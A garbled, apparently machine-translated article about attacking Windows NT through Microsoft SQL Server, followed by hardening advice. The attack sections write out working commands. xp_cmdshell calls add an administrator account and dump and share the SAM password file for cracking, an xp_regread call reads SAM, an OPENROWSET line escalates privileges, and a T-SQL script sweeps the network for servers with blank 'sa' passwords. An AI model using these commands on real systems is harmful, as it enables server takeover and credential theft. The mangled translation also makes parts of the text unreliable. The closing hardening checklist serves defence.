At present, there are many ways to invade the NT server, such as the use of the vulnerability of IIS, but
Everyone doesn't know not to pay attention, actually through the SQL database server associated with the NT server.
The example is also a very proportional means. You can see a news report below:
Http://www.vnunet.com/news/1110938.
Herbless intrusted some sites, such as Legoland.co.uk sites are through SQL servers
The invasion is destroyed to the control of the system. So the protection of SQL servers is not
Less, here I organize some vulnerabilities for everyone to refer, laugh, laugh.
-------------------------------------------------- ----------------
Let's first take a look at the network protocol library supported by the SQL service program:
-------------------------------------------------- ----------------
| SQL Server Network Protocol Libraries |
-------------------------------------------------- ----------------
Protocol Library | Possible Vulnerabilities | Whether encryption |
-------------------------------------------------- ----------------
| Named Pipes | - Using NT SMB port (TCP139, UDP137, | No |
| (Anti-name pipeline) | 138) to communicate, these can be pass | |
| | Firewall control, but if the internal network can | |
| | Free access to it is also a small defect | |
| | - User name, password, and data are not added | |
| | Transfer, anyone can come through Sniffer | |
| | Data capture. | | |
-------------------------------------------------- ----------------
| IP sockets | - Default Status Open 1433, you can use | No |
| | Scanner to view this port. | | |
| | Can be intercepted by Sniffer. | | |
-------------------------------------------------- ----------------
| Multi-Protocol | - Client Need to support NT RPCs; in different | Yes |
| | Kinds of types may cause problems. | | |
| - Use TCP random ports by default, but | | |
| | Firewall for port map fixation (ginseng | |
| | Look at KB Q164667). | | |
| | - Need to pay attention to whether the encryption option is selected, silently | |
| | Do not select this option. | | |
-------------------------------------------------- ----------------
| NWLINK | - There is a danger of intercepting data by Sniffer | No |
-------------------------------------------------- ----------------
AppleTalk (ADSP) | - Danger of Intercepting Data by Sniffer |
-------------------------------------------------- ----------------
Banyan Vines | - There is a risk of intercepting data by Sniffer | No |
-------------------------------------------------- -------------- General recommendation is: If you can use Named Pipes on Integrated (NT) Security or
Multi-Protocol, then you use these protocol libraries, if possible, try to use Multi-Protocol
And enable encryption options. If you can't use it above, use the IP Sockets protocol and change
Its default ports and check the system to ensure that there is no SNIFFER. And, consider using a Web service
Administrative Object Layer, or COM components, and serve in the intermediate layer and SQL
Secure channels are used in the order. There are a lot of third-party products to encrypt this communication.
-------------------------------------------------- ---------------------
Let's talk about how the SQL Server's security models and how they work?
Safety mode defines some SQL Server how to authenticate users to use them, please see below
SPL Server 6.5 security mode and some description and distinctions made in SQL Server 7.0:
-------------------------------------------------- -----------------
| Safety Mode | SQL Server 6.5 | SQL Server 7.0 Changing Place |
-------------------------------------------------- -----------------
| Standard | - Login Definition in SQL Server | - Separate Standard Mode in SQL Server |
| Standard mode | and give a password. | Not used. |
| | - SQL Server Login Account & | |
| | WINDOW NT Separate | | |
-------------------------------------------------- -----------------
| Integrated | - Using Security Manager SQL account | - Be here "Windows Nt Only" |
| Integrated mode | | Mode. |
| | - Users are connected to SQL Server | - only work under NT system, in Win9x is not |
| | No specific separation login and | support. |
| | Password. | | |
| | - Password never stored in the application | - can be used directly into the NT group easy |
| | In the plain text in the network | Management, (note that there is a Builtin group in |
| | Transport. | Produced on the local system). |
| | -Sql server can use NT | | |
| | Certification method to authenticate users | | | |
| | You can use an account expiration, etc. | | |
| | - Need Named Pipe or Multi- | |
| | Protocol library. | | |
-------------------------------------------------- ------------------
| Mixed | - Some specials from the above way | - Become SQL Server and Windows NT |
| Mixing method | Log but back things is customer | mode. |
| | NT cannot establish a trusted connection. | - Try to use Window NT Only mode | |
-------------------------------------------------- ------------------
Login is just the first step, once the user logs in, the user must access a separate database, to make the above
Establishment, there must be an expression to give the user to each database for users in the SYSUSERS table. So, please pay attention to whether there is a "guest" account in your database and to give it to give it when you don't pay attention.
Some people visited your database.
For details, please refer to Microsoft's site:
http://www.microsoft.com/technet/sql/technote/secure.asp
-------------------------------------------------- -------------------
Some security issues in SQL Server:
There is a "SA" account, the password is empty, and this password is a member of the SQL Server security module, we will
You can use XP_cmdshell Stored Procedure (Extended Store)
Order operation, such as:
XP_cmdshell "Net User Testuser Ugothacked / ADD"
Then in:
XP_cmdshell "Net localgroup administrators testuser / add"
Such an attacker adds a user to the SQL Server.
Of course, the distance is usually required to have 1433 ports, connect through the MySQL client.
Of course you can use:
XP_cmdshell "rdisk / s"
The method, so that information is rebuilt in the / WinNT / Repair directory without prompting users. then
After SAM backup, an attacker can create an SMB connection to a shared or establish a connection:
XP_cmdshell "Net Share Getsam = C: / Winnt / Repair"
Use the sharing to get this file and then use the L0PHTCRACK to run. If the SMB port is fired
Controlled, or closed, the attacker can also copy Sam._ file to the web directory for anonymous browser
download. If people have no IIS, why don't you use TFTP :).
OK, through this controlled SQL Server server, attackers can find inside the network through it
Other machines to expand the results, below is a SQL script to list other SQL Server existence in the network.
An example of empty account 'sa':
-------------------------------------------------- ---------------------
- Create Temp Table To Store Enumerated Servers
Set nocount on
Create Table #Temp (ShellDump Varchar (255))
INSERT #TEMP EXEC XP_CMDSHELL 'OSQL -L'
Declare @current_server varchar (255), @conn_string varchar (255)
Declare SQL_CURSOR CURSOR for SELECT * FROM #TEMP
Open SQL_CURSOR FETCH NEXT from SQL_CURSOR INTO @current_server
- Loop THROUGH Potential Targets and Check for Null Sa Accounts
- IF Target Is Vulnerable, Version Information Will Be Displayed
While @@ fetch_status = 0
Begin
IF @current_server <> 'Servers:' Begin
SELECT @current_server = rtrim (Ltrim (@current_server))
SELECT @conn_string = 'exec XP_cmdshell' 'osql -s' @current_server ' -usa -p -q "SELECT @@ version" ''
Print 'Attempting Connection To Server:' @current_server
Execute (@conn_string)
Print '=============================================== ===================== '
End
Fetch next from sql_cursor @current_server
End
- Clean Up
Close SQL_CURSOR
Deallocate SQL_CURSOR
DROP TABLE #TEMP
-------------------------------------------------- --------------------
Of course, some people may also close XP_cmdshell extended storedure,
We can also use the following methods:
XP_REGREAD 'HKEY_LOCAL_MACHINE', 'Security / Sam / Domains / Account', 'F'
If the MSSQLServer service is running under the local system account, if you don't have syskey on the system,
The call can return the encrypted password or SID in the registry.
-------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
Another vulnerability is the improvement of the rights about Adhoc Heterogenus Queries, please see the following Microsoft
Description: http://www.microsoft.com/technet/security/bulletin/fq00-014.asp
With regard to the above vulnerabilities, you can use the following xploit to obtain the right to improve:
Select * from OpenRowSet ('sqloledb', 'trusted_connection = yes; data source = myserver ",
'Set fmtonly off execute master..xp_cmdshell "DIR C: /")
This is one of you like to do other orders, think you can think of it.
-------------------------------------------------- ------------------------- and the nearest vulnerability: Extended Stored Procedure Parameter Parsing
Process Parameters Analysis of the Vulnerability, Details In this URL:
Http://www.microsoft.com/technet/security/bulletin/ms00-092.asp.
The main problem is to provide an API function SRV_PARAMINFO () in the MSD. It is used to extend the stored procedure call.
Explain in depth parameters, such as:
Exec
To query the directory tree of "C: / Winnt", you can express it as follows:
EXEC XP_DIRTREE 'C: / WINNT'
But did not check the length of each parameter, pass a quite long string, there is a cover other stack
The parameters may result in buffering.
The process that is currently known is as follows:
It is known that the affected expansion stored procedures are as follows:
1, xp_peekqueue (xpqueue.dll)
XP_PrintStatements (XPREPL.DLL)
Giving the first parameter to deliver a long string override the return address saved by the exception handler.
2, XP_Proxiedmetata (XPREPL.DLL)
This stored procedure uses four parameters. Giving the second parameter to pass the long string override an abnormal place
The returned address saved by the procedure.
3, XP_setsqlsecurity (xpstar.dll)
This stored procedure uses four parameters. Give the third parameter to deliver a long string that will make the entire SQL
The Server process is terminated immediately.
4, xp_displayparamstmt (xprepl.dll)
XP_enumResultSet (XPREPL.DLL)
XP_ShowColv (XPREPL.DLL)
XP_UPDATECOLVBM (XPREPL.DLL)
Give the first parameter to deliver a long string that will cause illegal operation and override the returns saved by the exception handler.
Back address.
Here tells you a skillful thing, if you want to know that these extension stored procedures call the write DLL
Document, you can do this, such as:
Select O.Name, C.Text from dbo.syscomments C, dbo.sysObjects o where c.id = o.id and o.name = 'xp_peekqueue'
This way you can get the DLL that calls this extended stored procedure. If Microsoft has no patch, you will
Temporarily change this DLL file, of course, some DLL file calls several extended stored procedures and cannot be blindly changed.
Otherwise, other can't be used, you need to use the following to know that the DLL calls those extended stored procedures:
Select O.Name, C.Text from dbo.syscomments c, dbo.sysobjects o where c.id = o.id and c.text = 'xpueue.dll'
Fortunately, Microsoft has made a patch, you can find it below, don't have one to find a DLL program, huh, huh:
http://support.microsoft.com/support/sql/xp_security.asp
This vulnerability @stake discovers and provides a demonstration test code, you can find it here:
http://www.atstake.com/research/advisories/2000/sqladv2-poc.c
-------------------------------------------------- ------------------------ OK, of course SQL Server also has some other vulnerabilities, relatively mild, such as the administrator discovered by ISS
Login ID is stored in the registry, its encryption method is simple, it is easy to get, detailed
Please see: http://xForce.iss.net/alerts/advise45.php3. Everyone can go to others
Location to find.
-------------------------------------------------- -------------------
Some security recommendations for SQL Server systems:
- Guarantee the latest security patches, as follows:
Windows NT 4.0 - Service Pack 6A
SQL Server 6.5 - Service Pack 5a
SQL Server 7.0 - Service Pack 2. (Various HotFixes - Check
http://www.microsoft.com/download)
SQL Server 2000 - HotFix S80233i.exe (Intel)
Of course, everyone must pay close attention to Microsoft's safety announcement.
- Do not use port 1433 in IP sockets, if you use multi-protocol
Modify the port.
- Don't embed the 'SA' password into any application such as VB / Delphi Apps, or one
In the global.asa file, because "sa" is a default password for SQL Server, its permissions
Similar to the administrator account with the Windows NT system, and the password is empty.
- Change the password of 'SA' and 'Probe' account.
- Ensure that SQL Server's error is recorded on the NTFS system.
- If you don't need xp_cmdshell (use sp_dropextendedproc 'xp_cmdshell')
Do not leave the XP_CMDSHELL Extended Stored Proc (extended stored procedure)
On the device. Enter: in any ISQL window:
Use master
sp_dropextendedProc 'XP_cmdshell'
- Discard No OLE automatic stored procedures, of course, some features in Enterprise Manager
Will not be used, these processes include the following:
SP_OACREATE SP_OADESTROY
SP_OAGETERRORINFO SP_OAGETPROPERTY
SP_OAMETHOD SP_OASETPROPERTY
SP_OASTOP
- Remove the unwanted registry access process, as follows:
XP_REGADDMULTINTISTRING
XP_RegdeleteKey
XP_Regdeletevalue
XP_RegenumValues
XP_REGREAD
XP_REGREMOVEMULTINTRING
XP_Regwrite
- Remove other system stored procedures, if you think you think you still have a threat, of course
Be careful with these processes, you can test them on the test machine to ensure you normal
The system can work, these processes include:
SP_BINDSESSION SP_CURSOR SP_CURSORCLOSE
SP_CURSORFETCH SP_CURSoropen sp_cursoroption
sp_getbindtoken sp_getmbcscharlen sp_ismbcsleadbyte
SP_OACREATE SP_OADESTROY SP_OAGETERRORINFOSP_OAGETPROPERTY SP_OAMETHOD SP_OASETPROPERTY
sp_oastop sp_replcmds sp_replcounters
SP_REPLDONE SP_REPLFLUSH SP_REPLSTATUS
SP_REPLTRANS SP_SDIDEBUG XP_AVAILAMEDIA
XP_cmdshell xp_deletemail xp_dirtree
XP_DROPWEBTASK XP_DSNInfo XP_ENUMDSN
XP_ENUMERROUPS XP_ENUMQUEDTASKS
XP_EVENTLOG XP_FINDNEXTMSG XP_FIXEDDRIVES
XP_GETFILEDETAILS XP_GETNETNAME XP_GRANTLOGIN
XP_LOGEVENT XP_LOGINCONFIG XP_LOGINFO
XP_makewebtask xp_msver xp_perfend
XP_PERFMONITOR XP_PERFSAMPLE XP_PERFSTART
XP_readerrorlog xp_readmail xp_revokelogin
XP_RunwebTask XP_SCHEDULERSIGNAL XP_SENDMAIL
XP_ServiceControl XP_SNMP_GETSTATE XP_SNMP_RASETRAP
XP_SPRINTF XP_SQLINVENTORY XP_SQLREGISTER
XP_SQLTRACE XP_SSCANF XP_STARTMAIL
XP_Stopmail XP_SUBDIRS XP_UNC_TO_DRIVE
- Remove the Guest user in the database.
- Turn off SQL Mail compatibility to prevent some Trojan viruses.
- Set a task handle to schedule the following program:
FINDSTR / C: "login failed" /msql7/log/*.* "
Redirect to other files or mail to the administrator mailbox.
- Take an account with an empty password frequently:
Use master
SELECT NAME,
Password
From syslogins
WHERE Password is Null
ORDER BY NAME
- Check all stored procedures and extended stored procedures that do not require 'sa' permission:
Use master
Select sysobjects.name
From sysobjects, sysprotects
Where sysprotects.uid = 0
And xtype in ('x', 'p')
And sysObjects.id = sysprotects.id
ORDER BY NAME
- Ensure that the transmission information of SQL Server is in an isolated network segment.